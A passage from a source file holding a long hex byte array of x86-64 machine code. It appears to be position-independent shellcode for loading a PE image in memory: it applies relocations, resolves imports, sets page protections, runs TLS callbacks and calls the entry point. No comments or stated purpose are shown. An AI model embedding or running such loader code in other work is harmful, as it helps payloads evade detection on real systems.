1157 0x20, 0x04, 0x00, 0x00, 0x41, 0x89, 0xd1, 0x41, 0xb8, 0x00, 0x00, 0x00,
1158 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8,
1159 0x56, 0xd6, 0xff, 0xff, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xe0, 0x04,
1160 0x00, 0x00, 0x48, 0x89, 0x10, 0xe9, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b,
1161 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0x70,
1162 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8b,
1163 0x85, 0x18, 0x05, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x74, 0x3b,
1164 0x48, 0x8b, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x02, 0x48,
1165 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0x4d, 0x0d,
1166 0x00, 0x00, 0x85, 0xc0, 0x74, 0x1d, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00,
1167 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
1168 0x8b, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x37, 0x48,
1169 0x8b, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x02, 0x48, 0x8b,
1170 0x85, 0x20, 0x04, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49,
1171 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00,
1172 0xe8, 0xb9, 0xd5, 0xff, 0xff, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xe0,
1173 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83, 0x85, 0xe8, 0x04, 0x00,
1174 0x00, 0x08, 0x48, 0x83, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x08, 0xe9, 0xf4,
1175 0xfe, 0xff, 0xff, 0x90, 0x48, 0x83, 0x85, 0xd8, 0x04, 0x00, 0x00, 0x14,
1176 0x48, 0x8b, 0x85, 0xd8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x85, 0xc0,
1177 0x0f, 0x85, 0x6f, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00,
1178 0x00, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00,
1179 0x00, 0x83, 0xbd, 0x3c, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x70, 0x01,
1180 0x00, 0x00, 0x8b, 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70,
1181 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x04, 0x00, 0x00, 0xe9, 0x45,
1182 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b, 0x40,
1183 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89,
1184 0x85, 0x28, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x04, 0x00, 0x00,
1185 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0x17,
1186 0xd8, 0xff, 0xff, 0x48, 0x89, 0x85, 0x20, 0x04, 0x00, 0x00, 0x48, 0x83,
1187 0xbd, 0x20, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xf4, 0x00, 0x00, 0x00,
1188 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2,
1189 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x04,
1190 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x0c,
1191 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
1192 0xe0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48,
1193 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xb0, 0x00, 0x00, 0x00, 0x48,
1194 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
1195 0x79, 0x3a, 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00,
1196 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x20, 0x04, 0x00, 0x00, 0x41, 0x89, 0xd1,
1197 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
1198 0x10, 0x05, 0x00, 0x00, 0xe8, 0x7d, 0xd4, 0xff, 0xff, 0x48, 0x89, 0xc2,
1199 0x48, 0x8b, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x4f,
1200 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b,
1201 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x18, 0x04, 0x00, 0x00,
1202 0x48, 0x8b, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x02, 0x48,
1203 0x8b, 0x85, 0x20, 0x04, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
1204 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00,
1205 0x00, 0xe8, 0x2c, 0xd4, 0xff, 0xff, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85,
1206 0xe0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83, 0x85, 0xe8, 0x04,
1207 0x00, 0x00, 0x08, 0x48, 0x83, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x08, 0xe9,
1208 0x40, 0xff, 0xff, 0xff, 0x90, 0xeb, 0x01, 0x90, 0x48, 0x83, 0x85, 0xd0,
1209 0x04, 0x00, 0x00, 0x20, 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b,
1210 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x85, 0xa9, 0xfe, 0xff, 0xff, 0x48, 0x8b,
1211 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, 0xc2, 0x48, 0x8b,
1212 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x10, 0x04, 0x00, 0x00,
1213 0x48, 0x8b, 0x95, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xb0, 0x02,
1214 0x00, 0x00, 0x49, 0x89, 0xd0, 0xba, 0x21, 0x00, 0x00, 0x00, 0x48, 0x89,
1215 0xc7, 0x4c, 0x89, 0xc6, 0x48, 0x89, 0xd1, 0xf3, 0x48, 0xa5, 0x48, 0xc7,
1216 0x85, 0xb8, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x85,
1217 0xb6, 0x02, 0x00, 0x00, 0x0f, 0xb7, 0xd0, 0x48, 0x89, 0xd0, 0x48, 0xc1,
1218 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0x45,
1219 0x58, 0x48, 0x8d, 0x4d, 0x58, 0x48, 0x8d, 0x85, 0xb8, 0x03, 0x00, 0x00,
1220 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x30,
1221 0xc7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
1222 0x00, 0x30, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00,
1223 0x00, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8,
1224 0x9f, 0x33, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd,
1225 0x54, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x5c, 0x0a, 0x00, 0x00, 0x0f,
1226 0xb7, 0x85, 0xb6, 0x02, 0x00, 0x00, 0x0f, 0xb7, 0xd0, 0x89, 0xd0, 0xc1,
1227 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0xc1, 0x48, 0x8b, 0x85,
1228 0xb8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x48, 0x04, 0x00, 0x00, 0x41,
1229 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x46, 0x2b, 0x00, 0x00, 0x48, 0x8b,
1230 0x85, 0x10, 0x05, 0x00, 0x00, 0x8b, 0x80, 0x48, 0x05, 0x00, 0x00, 0x83,
1231 0xf8, 0x01, 0x75, 0x73, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f,
1232 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x41, 0x48, 0x8b,
1233 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x50, 0x54, 0x48, 0x8b, 0x45, 0x70,
1234 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
1235 0xc0, 0x2a, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b,
1236 0x50, 0x54, 0x48, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00, 0x41, 0x89, 0xd0,
1237 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x9f, 0x2a, 0x00,
1238 0x00, 0xeb, 0x20, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x48,
1239 0x54, 0x48, 0x8b, 0x55, 0x70, 0x48, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00,
1240 0x41, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xc1, 0x2a, 0x00, 0x00, 0x48,
1241 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00,
1242 0x00, 0x84, 0xc0, 0x0f, 0x85, 0xbe, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
1243 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48,
1244 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xa7, 0x31,
1245 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04,
1246 0x00, 0x00, 0x00, 0x0f, 0x88, 0x65, 0x09, 0x00, 0x00, 0x83, 0xbd, 0x58,
1247 0x04, 0x00, 0x00, 0x00, 0x74, 0x08, 0x48, 0xc7, 0x45, 0x70, 0x00, 0x00,
1248 0x00, 0x00, 0x48, 0xc7, 0x45, 0x68, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1249 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x70, 0x48, 0x8b, 0x95,
1250 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x50, 0xc7, 0x44, 0x24,
1251 0x48, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00,
1252 0x00, 0xc7, 0x44, 0x24, 0x38, 0x02, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55,
1253 0x68, 0x48, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00,
1254 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00,
1255 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc2,
1256 0xff, 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0xed, 0x30, 0x00, 0x00,
1257 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00,
1258 0x00, 0x0f, 0x88, 0xda, 0x08, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x68, 0x48,
1259 0x8d, 0x45, 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89,
1260 0x54, 0x24, 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x89,
1261 0x54, 0x24, 0x20, 0x41, 0xb9, 0x08, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8,
1262 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x76,
1263 0x31, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1264 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x92, 0x08, 0x00, 0x00, 0xc7, 0x85,
1265 0xac, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x10, 0x03, 0x00,
1266 0x00, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04,
1267 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0,
1268 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8,
1269 0x1e, 0x83, 0xe0, 0x01, 0x89, 0x85, 0xd4, 0x03, 0x00, 0x00, 0x48, 0x8b,
1270 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00, 0x48,
1271 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0,
1272 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8, 0x1f, 0x89, 0x85,
1273 0xd0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b,
1274 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02,
1275 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40,
1276 0x24, 0xc1, 0xe8, 0x1d, 0x83, 0xe0, 0x01, 0x89, 0x85, 0xcc, 0x03, 0x00,
1277 0x00, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x74, 0x18, 0x83, 0xbd,
1278 0xcc, 0x03, 0x00, 0x00, 0x00, 0x74, 0x0f, 0xc7, 0x85, 0xa4, 0x04, 0x00,
1279 0x00, 0x80, 0x00, 0x00, 0x00, 0xe9, 0x06, 0x01, 0x00, 0x00, 0x83, 0xbd,
1280 0xd4, 0x03, 0x00, 0x00, 0x00, 0x74, 0x18, 0x83, 0xbd, 0xcc, 0x03, 0x00,
1281 0x00, 0x00, 0x74, 0x0f, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x20, 0x00,
1282 0x00, 0x00, 0xe9, 0xe5, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x03, 0x00,
1283 0x00, 0x00, 0x74, 0x42, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x74,
1284 0x39, 0x83, 0xbd, 0xcc, 0x03, 0x00, 0x00, 0x00, 0x75, 0x30, 0x48, 0x8b,
1285 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00,
1286 0x84, 0xc0, 0x75, 0x0f, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x08, 0x00,
1287 0x00, 0x00, 0xe9, 0xa9, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xa4, 0x04, 0x00,
1288 0x00, 0x04, 0x00, 0x00, 0x00, 0xe9, 0x9a, 0x00, 0x00, 0x00, 0x83, 0xbd,
1289 0xd4, 0x03, 0x00, 0x00, 0x00, 0x75, 0x1e, 0x83, 0xbd, 0xd0, 0x03, 0x00,
1290 0x00, 0x00, 0x75, 0x15, 0x83, 0xbd, 0xcc, 0x03, 0x00, 0x00, 0x00, 0x74,
1291 0x0c, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0xeb,
1292 0x73, 0x83, 0xbd, 0xd4, 0x03, 0x00, 0x00, 0x00, 0x74, 0x1e, 0x83, 0xbd,
1293 0xd0, 0x03, 0x00, 0x00, 0x00, 0x75, 0x15, 0x83, 0xbd, 0xcc, 0x03, 0x00,
1294 0x00, 0x00, 0x75, 0x0c, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x02, 0x00,
1295 0x00, 0x00, 0xeb, 0x4c, 0x83, 0xbd, 0xd4, 0x03, 0x00, 0x00, 0x00, 0x75,
1296 0x1e, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x75, 0x15, 0x83, 0xbd,
1297 0xcc, 0x03, 0x00, 0x00, 0x00, 0x75, 0x0c, 0xc7, 0x85, 0xa4, 0x04, 0x00,
1298 0x00, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x25, 0x83, 0xbd, 0xd4, 0x03, 0x00,
1299 0x00, 0x00, 0x75, 0x1c, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x74,
1300 0x13, 0x83, 0xbd, 0xcc, 0x03, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xc7, 0x85,
1301 0xa4, 0x04, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xb8,
1302 0x03, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0,
1303 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48,
1304 0x01, 0xc8, 0x8b, 0x40, 0x24, 0x25, 0x00, 0x00, 0x00, 0x04, 0x85, 0xc0,
1305 0x74, 0x0a, 0x81, 0x8d, 0xa4, 0x04, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
1306 0x48, 0x8b, 0x4d, 0x70, 0x4c, 0x8b, 0x85, 0xb8, 0x03, 0x00, 0x00, 0x8b,
1307 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02,
1308 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x4c, 0x01, 0xc0, 0x8b, 0x40,
1309 0x0c, 0x89, 0xc0, 0x48, 0x01, 0xc8, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00,
1310 0x00, 0x0f, 0xb7, 0x85, 0xb6, 0x02, 0x00, 0x00, 0x0f, 0xb7, 0xc0, 0x83,
1311 0xe8, 0x01, 0x39, 0x85, 0xac, 0x04, 0x00, 0x00, 0x73, 0x5b, 0x48, 0x8b,
1312 0x95, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x85, 0xac, 0x04, 0x00, 0x00, 0x83,
1313 0xc0, 0x01, 0x89, 0xc1, 0x48, 0x89, 0xc8, 0x48, 0xc1, 0xe0, 0x02, 0x48,
1314 0x01, 0xc8, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c,
1315 0x41, 0x89, 0xc0, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x95,
1316 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48,
1317 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x0c,
1318 0x89, 0xc2, 0x4c, 0x89, 0xc0, 0x48, 0x29, 0xd0, 0x48, 0x89, 0x85, 0x90,
1319 0x00, 0x00, 0x00, 0xeb, 0x2a, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00,
1320 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0,
1321 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b,
1322 0x40, 0x10, 0x89, 0xc0, 0x48, 0x89, 0x85, 0x90, 0x00, 0x00, 0x00, 0xc7,
1323 0x85, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x8b, 0x85,
1324 0xa4, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x90, 0x00, 0x00, 0x00, 0x48,
1325 0x8d, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00,
1326 0x00, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00,
1327 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8,
1328 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x5e,
1329 0x2e, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1330 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x7d, 0x05, 0x00, 0x00, 0x83, 0x85,
1331 0xac, 0x04, 0x00, 0x00, 0x01, 0x0f, 0xb7, 0x85, 0xb6, 0x02, 0x00, 0x00,
1332 0x0f, 0xb7, 0xc0, 0x39, 0x85, 0xac, 0x04, 0x00, 0x00, 0x0f, 0x82, 0xda,
1333 0xfc, 0xff, 0xff, 0xc7, 0x85, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1334 0x00, 0x8b, 0x85, 0xdc, 0x02, 0x00, 0x00, 0x89, 0xc0, 0x48, 0x89, 0x85,
1335 0x90, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x90, 0x00, 0x00, 0x00, 0x48,
1336 0x8d, 0x45, 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89,
1337 0x54, 0x24, 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x89,
1338 0x54, 0x24, 0x20, 0x41, 0xb9, 0x02, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8,
1339 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xda,
1340 0x2d, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1341 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xfc, 0x04, 0x00, 0x00, 0x48, 0x8b,
1342 0x85, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xc1, 0x41, 0xb8, 0x00, 0x00,
1343 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc1, 0xff, 0xff,
1344 0xff, 0xff, 0xe8, 0xde, 0x2e, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00,
1345 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xcb, 0x04,
1346 0x00, 0x00, 0x8b, 0x85, 0x80, 0x03, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04,
1347 0x00, 0x00, 0x83, 0xbd, 0x3c, 0x04, 0x00, 0x00, 0x00, 0x74, 0x68, 0x8b,
1348 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0,
1349 0x48, 0x89, 0x85, 0x08, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x04,
1350 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x85, 0xc8, 0x04, 0x00,
1351 0x00, 0x48, 0x83, 0xbd, 0xc8, 0x04, 0x00, 0x00, 0x00, 0x74, 0x38, 0xeb,
1352 0x27, 0x48, 0x8b, 0x85, 0xc8, 0x04, 0x00, 0x00, 0x4c, 0x8b, 0x08, 0x48,
1353 0x8b, 0x45, 0x70, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00,
1354 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x48, 0x83, 0x85, 0xc8,
1355 0x04, 0x00, 0x00, 0x08, 0x48, 0x8b, 0x85, 0xc8, 0x04, 0x00, 0x00, 0x48,
1356 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x75, 0xca, 0x48, 0x8b, 0x85, 0x18, 0x05,
1357 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x34, 0x02, 0x00,
1358 0x00, 0x8b, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45,
1359 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x00, 0x04, 0x00, 0x00, 0x48,
1360 0x8b, 0x45, 0x70, 0x4c, 0x8b, 0x8d, 0x00, 0x04, 0x00, 0x00, 0x41, 0xb8,
1361 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1,
1362 0x41, 0xff, 0xd1, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x0f, 0xb6,
1363 0x80, 0x0c, 0x03, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0x39, 0x03, 0x00,
1364 0x00, 0x8b, 0x85, 0x38, 0x03, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00,
1365 0x00, 0x8b, 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48,
1366 0x01, 0xd0, 0x48, 0x89, 0x85, 0xf8, 0x03, 0x00, 0x00, 0x83, 0xbd, 0x3c,
1367 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8b,
1368 0x85, 0xf8, 0x03, 0x00, 0x00, 0x8b, 0x40, 0x18, 0x89, 0x85, 0xa8, 0x04,
1369 0x00, 0x00, 0x83, 0xbd, 0xa8, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xef,
1370 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x03, 0x00, 0x00, 0x8b, 0x40,
1371 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89,
1372 0x85, 0xf0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x03, 0x00, 0x00,
1373 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0,
1374 0x48, 0x89, 0x85, 0xe8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x03,
1375 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48,
1376 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe0, 0x03, 0x00, 0x00, 0x8b, 0x85, 0xa8,
1377 0x04, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85,
1378 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x03, 0x00, 0x00, 0x48,
1379 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01,
1380 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18,
1381 0x05, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8b,
1382 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x87, 0x25, 0x00,
